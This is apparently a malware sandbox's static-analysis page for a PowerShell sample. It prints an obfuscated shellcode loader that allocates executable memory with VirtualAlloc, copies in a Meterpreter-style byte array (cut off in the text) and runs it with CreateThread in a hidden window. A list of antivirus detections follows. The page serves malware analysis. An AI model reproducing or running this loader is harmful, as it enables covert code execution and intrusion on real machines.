Static | ZeroBOX
No static analysis available.
$MLPjjKUUfrxaW = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
$ucAYrQXSEEz = Add-Type -memberDefinition $MLPjjKUUfrxaW -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $lbkvqfyVTMqSxg = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x65,0x48,0x8b,0x52,0x60,0x56,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x48,0x1,0xd0,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0
$huXDePViwJR = $ucAYrQXSEEz::VirtualAlloc(0,[Math]::Max($lbkvqfyVTMqSxg.Length,0x1000),0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($lbkvqfyVTMqSxg,0,$huXDePViwJR,$lbkvqfyVTMqSxg.Length)
$ucAYrQXSEEz::CreateThread(0,0,$huXDePViwJR,0,0,0)
powershell -windowstyle hidden
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Generic.Powershell.Injector.B.1A3BAB3B
CAT-QuickHeal Clean
Skyhigh PS/Injector.ad
McAfee PS/Injector.ad
Malwarebytes Clean
VIPRE Generic.Powershell.Injector.B.1A3BAB3B
Sangfor Trojan.Generic-PS.Save.f269422b
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen178
ESET-NOD32 PowerShell/HackTool.Meterpreter.A potentially unsafe
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [PUP]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Generic.Powershell.Injector.B.1A3BAB3B
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Generic.Powershell.Injector.B.1A3BAB3B
Rising Clean
Emsisoft Generic.Powershell.Injector.B.1A3BAB3B (B)
F-Secure Trojan.TR/PShell.Agent.PRC
DrWeb PowerShell.Inject.67
Zillya Clean
TrendMicro Clean
CMC Clean
Sophos ATK/Venom-A
Ikarus Trojan.PowerShell.Rozena
Jiangmin Clean
Google Detected
Avira TR/PShell.Agent.PRC
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Script/Wacatac.B!ml
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Powershell.Injector.B.1A3BAB3B
ViRobot Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
GData Generic.Powershell.Injector.B.1A3BAB3B
Varist PSH/Rozena.B.gen!Camelot
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Generic.Powershell.Injector.B.1A3BAB3B
MAX malware (ai score=82)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [PUP]
Panda Clean
No IRMA results available.